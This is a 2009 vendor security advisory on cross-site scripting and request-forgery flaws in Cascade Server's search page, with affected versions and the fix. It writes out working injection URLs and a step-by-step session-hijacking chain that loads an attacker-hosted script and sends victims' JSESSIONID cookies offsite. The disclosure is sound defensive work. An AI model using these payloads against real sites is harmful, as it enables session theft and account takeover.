Security Update 6-29-2009

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions

Severity: Moderate

Hannon Hill rates the severity of these vulnerabilities as Moderate. The vulnerabilities allow an attacker to make victims execute arbitrary JavaScript, gain access to Cascade, or elevate his/her privileges; but they require the attacker to manipulate victims using social engineering tactics. If the attacker already had Cascade credentials, he/she could embed a malicious link in frequently visited content to more easily manipulate victims into navigating to it.

Risk Assessment

The underlying vulnerability is that user input is returned verbatim in the browser when the search query supplied by the user is not parsable.

XSS Vulnerability

An attacker without access to Cascade could manipulate victims using social engineering tactics to execute arbitrary JavaScript when navigating to the the Cascade search action.
An example link would be:

http://domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Ealert('hacked')%3C/script%3E&mode=basic

An attacker with access to Cascade could embed a link to the Cascade search action containing arbitrary JavaScript in a prominent place within Cascade page content to more easily manipulate victims into navigating to the link.

CSRF Vulnerability

The CSRF vulnerability is an extension of the XSS scripting vulnerability except that it also requires the attacker to have access to a server at the same top-level domain as where Cascade is running. For example, if Cascade is hosted at cascade.hannonhill.com, the attacker would also need access to a sub-domain like intranet.hannonhill.com.
The steps to exploit this vulnerability are as follows:
1. Create XSS like:

http://cascade.domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Edocument.domain=domain.com%3C/script%3E%3Cscript%20src=http://subdomain.domain.com/attacker/x.js%20/%3E&mode=basic

Here we are resetting the document domain for the page to the very top level domain. This allows the attacker to bypass the Same Origin browser security policy and security restrictions that would normally prevent a script from loading from a different server.
2. Social engineer a victim to visit the above XSS link, or if the attacker already had access to Cascade, embed this link in the content of a frequently visited page.
3. When the user clicks the link, the malicious script loads and shuttles victim's document.cookie (which include JSESSIONID) to offsite server.
4. Attacker visits https://cascade.domain.com:port/login.act to have the system set a valid cookie on the attacker's browser.
5. Attacker replaces his valid JSESSIONID with the one retrieved via XSS and successfully assumes the identity of the victim.

Vulnerability

The XSS and CSRF vulnerabilities exists for all Cascade Server versions prior to Cascade 5.7.5 in the 5 series, prior to 6.0.3 in the 6 series.

Fix

The fix is for Cascade to properly escape or hide user input when displaying the error message in the search results page.

This issue has been fixed in Cascade 5.7.5, 6.0.3, and later. There are no patch versions available for Cascade versions 5.5.x or earlier. We recommend an upgrade to Cascade 5.7.x or later.